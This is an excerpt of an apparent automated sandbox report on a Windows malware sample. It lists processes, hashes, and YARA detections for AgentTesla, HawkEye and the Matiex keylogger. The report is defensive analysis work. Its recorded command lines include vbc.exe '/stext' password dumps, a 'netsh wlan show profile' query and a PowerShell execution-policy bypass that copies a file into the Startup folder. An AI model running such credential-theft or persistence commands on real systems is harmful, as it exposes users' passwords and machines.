                                                                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000008.00000002.699392963.000000000352E000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000002.699392963.000000000352E000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_Matiex, Description: Yara detected Matiex Keylogger, Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exe, Author: Joe Security
                                                                                                  Antivirus matches:
                                                                                                  • Detection: 100%, Avira
                                                                                                  • Detection: 100%, Joe Sandbox ML
                                                                                                  • Detection: 46%, Metadefender, Browse
                                                                                                  • Detection: 89%, ReversingLabs
                                                                                                  Reputation:low

                                                                                                  Analysis Process: origigoods20.exe PID: 6352 Parent PID: 4888

                                                                                                  General

                                                                                                  Start time:08:51:52
                                                                                                  Start date:02/02/2021
                                                                                                  Path:C:\Users\user\AppData\Local\Temp\origigoods20.exe
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:'C:\Users\user~1\AppData\Local\Temp\origigoods20.exe' 0
                                                                                                  Imagebase:0xe0000
                                                                                                  File size:220672 bytes
                                                                                                  MD5 hash:61DC57C6575E1F3F2AE14C1B332AD2FB
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:.Net C# or VB.NET
                                                                                                  Yara matches:
                                                                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000A.00000002.430720019.00000000000E2000.00000002.00020000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000A.00000000.281843308.00000000000E2000.00000002.00020000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000A.00000002.454660209.0000000002801000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000A.00000002.454660209.0000000002801000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: C:\Users\user\AppData\Local\Temp\origigoods20.exe, Author: Joe Security
                                                                                                  Antivirus matches:
                                                                                                  • Detection: 100%, Avira
                                                                                                  • Detection: 100%, Joe Sandbox ML
                                                                                                  • Detection: 43%, Metadefender, Browse
                                                                                                  • Detection: 86%, ReversingLabs
                                                                                                  Reputation:low

                                                                                                  Analysis Process: dw20.exe PID: 6684 Parent PID: 3724

                                                                                                  General

                                                                                                  Start time:08:51:54
                                                                                                  Start date:02/02/2021
                                                                                                  Path:C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:dw20.exe -x -s 2164
                                                                                                  Imagebase:0x10000000
                                                                                                  File size:33936 bytes
                                                                                                  MD5 hash:8D10DA8A3E11747E51F23C882C22BBC3
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Reputation:high

                                                                                                  Analysis Process: vbc.exe PID: 6852 Parent PID: 3724

                                                                                                  General

                                                                                                  Start time:08:51:57
                                                                                                  Start date:02/02/2021
                                                                                                  Path:C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holdermail.txt'
                                                                                                  Imagebase:0x400000
                                                                                                  File size:1171592 bytes
                                                                                                  MD5 hash:C63ED21D5706A527419C9FBD730FFB2E
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Yara matches:
                                                                                                  • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000011.00000002.296594780.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                  Reputation:high

                                                                                                  Analysis Process: vbc.exe PID: 6868 Parent PID: 3724

                                                                                                  General

                                                                                                  Start time:08:51:58
                                                                                                  Start date:02/02/2021
                                                                                                  Path:C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holderwb.txt'
                                                                                                  Imagebase:0x400000
                                                                                                  File size:1171592 bytes
                                                                                                  MD5 hash:C63ED21D5706A527419C9FBD730FFB2E
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Yara matches:
                                                                                                  • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000012.00000002.308131659.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                  Reputation:high

                                                                                                  Analysis Process: WerFault.exe PID: 7028 Parent PID: 3724

                                                                                                  General

                                                                                                  Start time:08:52:03
                                                                                                  Start date:02/02/2021
                                                                                                  Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 3724 -s 1996
                                                                                                  Imagebase:0xb60000
                                                                                                  File size:434592 bytes
                                                                                                  MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:.Net C# or VB.NET
                                                                                                  Yara matches:
                                                                                                  • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 00000014.00000002.379809632.0000000005930000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                                                  • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000014.00000002.379809632.0000000005930000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                  • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000014.00000002.379809632.0000000005930000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                  Reputation:high

                                                                                                  Analysis Process: netsh.exe PID: 1744 Parent PID: 6264

                                                                                                  General

                                                                                                  Start time:08:52:33
                                                                                                  Start date:02/02/2021
                                                                                                  Path:C:\Windows\SysWOW64\netsh.exe
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:'netsh' wlan show profile
                                                                                                  Imagebase:0x13c0000
                                                                                                  File size:82944 bytes
                                                                                                  MD5 hash:A0AA3322BB46BBFC36AB9DC1DBBBB807
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language

                                                                                                  Analysis Process: conhost.exe PID: 1200 Parent PID: 1744

                                                                                                  General

                                                                                                  Start time:08:52:33
                                                                                                  Start date:02/02/2021
                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                  Imagebase:0x7ff774ee0000
                                                                                                  File size:625664 bytes
                                                                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language

                                                                                                  Analysis Process: I$s#$lT3ssl.exe PID: 1808 Parent PID: 3292

                                                                                                  General

                                                                                                  Start time:08:52:43
                                                                                                  Start date:02/02/2021
                                                                                                  Path:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\I$s#$lT3ssl.exe
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\I$s#$lT3ssl.exe'
                                                                                                  Imagebase:0xa20000
                                                                                                  File size:1655808 bytes
                                                                                                  MD5 hash:59D7D8D5DD3E0055E7C0DCC75897F569
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:.Net C# or VB.NET
                                                                                                  Antivirus matches:
                                                                                                  • Detection: 100%, Joe Sandbox ML
                                                                                                  • Detection: 20%, ReversingLabs

                                                                                                  Analysis Process: powershell.exe PID: 6908 Parent PID: 1808

                                                                                                  General

                                                                                                  Start time:08:52:50
                                                                                                  Start date:02/02/2021
                                                                                                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:'Powershell.exe' -ExecutionPolicy Bypass -command Copy-Item 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\I$s#$lT3ssl.exe' 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\I$s#$lT3ssl.exe'
                                                                                                  Imagebase:0x13c0000
                                                                                                  File size:430592 bytes
                                                                                                  MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:.Net C# or VB.NET

                                                                                                  Analysis Process: conhost.exe PID: 6980 Parent PID: 6908

                                                                                                  General

                                                                                                  Start time:08:52:51
                                                                                                  Start date:02/02/2021
                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                  Imagebase:0x7ff774ee0000
                                                                                                  File size:625664 bytes
                                                                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language

                                                                                                  Analysis Process: RegAsm.exe PID: 4828 Parent PID: 1808

                                                                                                  General

                                                                                                  Start time:08:52:53
                                                                                                  Start date:02/02/2021
                                                                                                  Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                  Imagebase:0x770000
                                                                                                  File size:64616 bytes
                                                                                                  MD5 hash:6FD7592411112729BF6B1F2F6C34899F
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:Visual Basic
                                                                                                  Yara matches:
                                                                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000001A.00000003.425880345.0000000003A2D000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000001A.00000003.414221299.00000000036C1000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000001A.00000003.418225668.0000000000E23000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000001A.00000003.418385560.000000000372B000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000001A.00000003.427152213.00000000039C1000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000001A.00000003.428390015.0000000000E23000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                  • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 0000001A.00000002.433264598.0000000000403000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                                                  • Rule: JoeSecurity_Matiex, Description: Yara detected Matiex Keylogger, Source: 0000001A.00000002.433264598.0000000000403000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 0000001A.00000002.433264598.0000000000403000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 0000001A.00000002.433264598.0000000000403000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 0000001A.00000002.433264598.0000000000403000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                  • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 0000001A.00000002.433264598.0000000000403000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000001A.00000003.419784850.000000000372B000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000001A.00000003.413803172.0000000000E23000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000001A.00000003.424187770.000000000372B000.00000004.00000001.sdmp, Author: Joe Security

                                                                                                  Analysis Process: hawkgoods.exe PID: 5440 Parent PID: 4828

                                                                                                  General

                                                                                                  Start time:08:52:55
                                                                                                  Start date:02/02/2021
                                                                                                  Path:C:\Users\user\AppData\Local\Temp\hawkgoods.exe
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:'C:\Users\user~1\AppData\Local\Temp\hawkgoods.exe' 0
                                                                                                  Imagebase:0xa40000
                                                                                                  File size:532992 bytes
                                                                                                  MD5 hash:FFDB58533D5D1362E896E96FB6F02A95
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:.Net C# or VB.NET
                                                                                                  Yara matches:
                                                                                                  • Rule: HKTL_NET_GUID_Stealer, Description: Detects c# red/black-team tools via typelibguid, Source: 0000001B.00000002.651684392.0000000007F40000.00000004.00000001.sdmp, Author: Arnim Rupp
                                                                                                  • Rule: HKTL_NET_GUID_Stealer, Description: Detects c# red/black-team tools via typelibguid, Source: 0000001B.00000002.651227274.0000000007C90000.00000004.00000001.sdmp, Author: Arnim Rupp
                                                                                                  • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 0000001B.00000000.417887646.0000000000A42000.00000002.00020000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                                                  • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 0000001B.00000000.417887646.0000000000A42000.00000002.00020000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 0000001B.00000000.417887646.0000000000A42000.00000002.00020000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 0000001B.00000000.417887646.0000000000A42000.00000002.00020000.sdmp, Author: Joe Security
                                                                                                  • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 0000001B.00000000.417887646.0000000000A42000.00000002.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                  • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 0000001B.00000002.642866499.00000000041B1000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 0000001B.00000002.642866499.00000000041B1000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                  • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 0000001B.00000002.636644097.0000000000A42000.00000002.00020000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                                                  • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 0000001B.00000002.636644097.0000000000A42000.00000002.00020000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 0000001B.00000002.636644097.0000000000A42000.00000002.00020000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 0000001B.00000002.636644097.0000000000A42000.00000002.00020000.sdmp, Author: Joe Security
                                                                                                  • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 0000001B.00000002.636644097.0000000000A42000.00000002.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                  • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 0000001B.00000002.641318198.00000000031B1000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                                                  • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 0000001B.00000002.641318198.00000000031B1000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                  • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 0000001B.00000002.641318198.00000000031B1000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group

                                                                                                  Analysis Process: origigoods40.exe PID: 3080 Parent PID: 4828

                                                                                                  General

                                                                                                  Start time:08:52:56
                                                                                                  Start date:02/02/2021
                                                                                                  Path:C:\Users\user\AppData\Local\Temp\origigoods40.exe
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:'C:\Users\user~1\AppData\Local\Temp\origigoods40.exe' 0
                                                                                                  Imagebase:0xe20000
                                                                                                  File size:221696 bytes
                                                                                                  MD5 hash:AE36F0D16230B9F41FFECBD3C5B1D660
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:.Net C# or VB.NET
                                                                                                  Yara matches:
                                                                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000001C.00000002.696128013.0000000003201000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000001C.00000002.696128013.0000000003201000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000001C.00000000.419299258.0000000000E22000.00000002.00020000.sdmp, Author: Joe Security

                                                                                                  Analysis Process: Matiexgoods.exe PID: 6532 Parent PID: 4828

                                                                                                  General

                                                                                                  Start time:08:52:57
                                                                                                  Start date:02/02/2021
                                                                                                  Path:C:\Users\user\AppData\Local\Temp\Matiexgoods.exe
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:'C:\Users\user~1\AppData\Local\Temp\Matiexgoods.exe' 0
                                                                                                  Imagebase:0xbd0000
                                                                                                  File size:455680 bytes
                                                                                                  MD5 hash:80C61B903400B534858D047DD0919F0E
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:.Net C# or VB.NET
                                                                                                  Yara matches:
                                                                                                  • Rule: JoeSecurity_Matiex, Description: Yara detected Matiex Keylogger, Source: 0000001E.00000002.681849072.0000000000BD2000.00000002.00020000.sdmp, Author: Joe Security

                                                                                                  Analysis Process: origigoods20.exe PID: 7160 Parent PID: 4828

                                                                                                  General

                                                                                                  Start time:08:52:57
                                                                                                  Start date:02/02/2021
                                                                                                  Path:C:\Users\user\AppData\Local\Temp\origigoods20.exe
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:'C:\Users\user~1\AppData\Local\Temp\origigoods20.exe' 0
                                                                                                  Imagebase:0x720000
                                                                                                  File size:220672 bytes
                                                                                                  MD5 hash:61DC57C6575E1F3F2AE14C1B332AD2FB
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:.Net C# or VB.NET
                                                                                                  Yara matches:
                                                                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000001F.00000000.423374232.0000000000722000.00000002.00020000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000001F.00000002.703454217.0000000002F71000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000001F.00000002.703454217.0000000002F71000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000001F.00000002.681903640.0000000000722000.00000002.00020000.sdmp, Author: Joe Security

                                                                                                  Analysis Process: dw20.exe PID: 5252 Parent PID: 5440

                                                                                                  General

                                                                                                  Start time:08:53:04
                                                                                                  Start date:02/02/2021
                                                                                                  Path:C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:dw20.exe -x -s 2092
                                                                                                  Imagebase:0x10000000
                                                                                                  File size:33936 bytes
                                                                                                  MD5 hash:8D10DA8A3E11747E51F23C882C22BBC3
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language

                                                                                                  Analysis Process: vbc.exe PID: 5776 Parent PID: 5440

                                                                                                  General

                                                                                                  Start time:08:53:06
                                                                                                  Start date:02/02/2021
                                                                                                  Path:C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holdermail.txt'
                                                                                                  Imagebase:0x400000
                                                                                                  File size:1171592 bytes
                                                                                                  MD5 hash:C63ED21D5706A527419C9FBD730FFB2E
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Yara matches:
                                                                                                  • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000022.00000002.446713470.0000000000400000.00000040.00000001.sdmp, Author: Joe Security

                                                                                                  Analysis Process: vbc.exe PID: 6108 Parent PID: 5440

                                                                                                  General

                                                                                                  Start time:08:53:07
                                                                                                  Start date:02/02/2021
                                                                                                  Path:C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holderwb.txt'
                                                                                                  Imagebase:0x400000
                                                                                                  File size:1171592 bytes
                                                                                                  MD5 hash:C63ED21D5706A527419C9FBD730FFB2E
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Yara matches:
                                                                                                  • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000023.00000002.465758929.0000000000400000.00000040.00000001.sdmp, Author: Joe Security

                                                                                                  Analysis Process: WerFault.exe PID: 4776 Parent PID: 5440

                                                                                                  General

                                                                                                  Start time:08:53:14
                                                                                                  Start date:02/02/2021
                                                                                                  Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 5440 -s 940
                                                                                                  Imagebase:0xb60000
                                                                                                  File size:434592 bytes
                                                                                                  MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:.Net C# or VB.NET
                                                                                                  Yara matches:
                                                                                                  • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 00000025.00000002.619183539.0000000005360000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                                                  • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000025.00000002.619183539.0000000005360000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                  • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000025.00000002.619183539.0000000005360000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group

                                                                                                  Disassembly

                                                                                                  Code Analysis

                                                                                                  Reset < >